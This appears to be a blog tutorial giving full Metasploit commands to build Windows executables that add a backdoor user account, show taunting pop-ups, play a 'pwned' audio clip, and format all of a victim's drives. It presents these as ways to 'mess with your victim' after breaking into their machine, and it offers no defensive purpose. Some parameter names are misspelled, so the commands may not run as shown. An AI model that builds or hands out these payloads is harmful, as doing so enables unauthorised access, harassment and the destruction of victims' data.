Fun with Metasploit Payloads

Ordinarily small things have no use but whenever it comes up to their greater relevance then at certain point of time it has a universalized impact and can create a complex situation. And this article is about some simple payloads that can help us to muddle with our victim. Hence, leaving a mark behind.

Moreover metasploit is not about hacking but it’s also about hacking in style. There are a lot of payloads that are too good to not to use. These payloads are like small droplets in an ocean but still they matter and there are only handful of people who about these payloads. Also so far we have only learnt about hardcore metasploit but let’s see what more cools things it has to show us.

Add User

Moving forward, let us learn how to make such payloads, open metasploit and use windows/adduser payload. This payload lets you create another user in your victim's PC. The commands are:

use windows/adduser

set user raaz

set pass Ignite@123

set wmic true

generate -t exe -f /root/Desktop/user.exe

With the execution of above command, a new user will be created in your victim's PC. And you can go to the shell of your victim's PC and see the result. And to see the user’s type:

net user

Message Box

Another payload is windows/messagebox. This payload makes a pop-up message appear on victim's PC. The message can be anything you want along with title. To create this payload again open metasploit and use windows/messagebox. The commands are:

use windows/messagebox

set text you have been hacked

set tittle Important Message

generate -t exe -f /root/Desktop/message.exe

And your payload is created. When you will send it and once the victim will open it then a pop-up message box will appear displaying your message like the following one:

Our next payload is windows/format_all_drives. This payload formats any desired drive. The commands to create this payload are :

use windows/format_all_drives

set vlomelabel 3

generate -t exe -f /root/Desktop/format.exe

When the payload is sent and opened, it formats their drive.

Speak

Another such payload is speak_pwned. This payload is a one-line command payload which creates an audio saying "you have been pawned" and now when the victim will open it then this audio will be played for him/her. And it's command is :

generate -t exe -f /root/Desktop/speak.exe

So that is how you can use different payloads to mess with your victim. Also you can create this payload and keep it safe with you so that you can use it whenever you want. And please note that all these payloads are post payloads to make these work you need to first hack your victim.

This way even the smaller things will make a difference; after all even a pawn can kill the king. And most importantly, once you are done with your victim you can leave him/her a souvenir.